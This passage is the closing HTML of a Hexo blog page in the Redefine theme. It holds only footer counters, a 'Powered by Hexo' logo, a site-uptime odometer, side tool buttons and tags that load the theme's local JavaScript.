                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.6.0</a></span>
        </div>
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="go-comment">
                <i class="fa-regular fa-comments"></i>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    

</main>


    
<script src="/js/libs/Swup.min.js"></script>

<script src="/js/libs/SwupSlideTheme.min.js"></script>

<script src="/js/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>







<script src="/js/tools/imageViewer.js" type="module"></script>

<script src="/js/utils.js" type="module"></script>

<script src="/js/main.js" type="module"></script>

<script src="/js/layouts/navbarShrink.js" type="module"></script>

<script src="/js/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/layouts/categoryList.js" type="module"></script>





    
<script src="/js/tools/codeBlock.js" type="module"></script>




    
<script src="/js/layouts/lazyload.js" type="module"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js" type="module"></script>









<div class="post-scripts" data-swup-reload-script>
    
        
<script src="/js/tools/tocToggle.js" type="module"></script>

<script src="/js/layouts/toc.js" type="module"></script>

<script src="/js/plugins/tabs.js" type="module"></script>

    
</div>


</body>
</html>
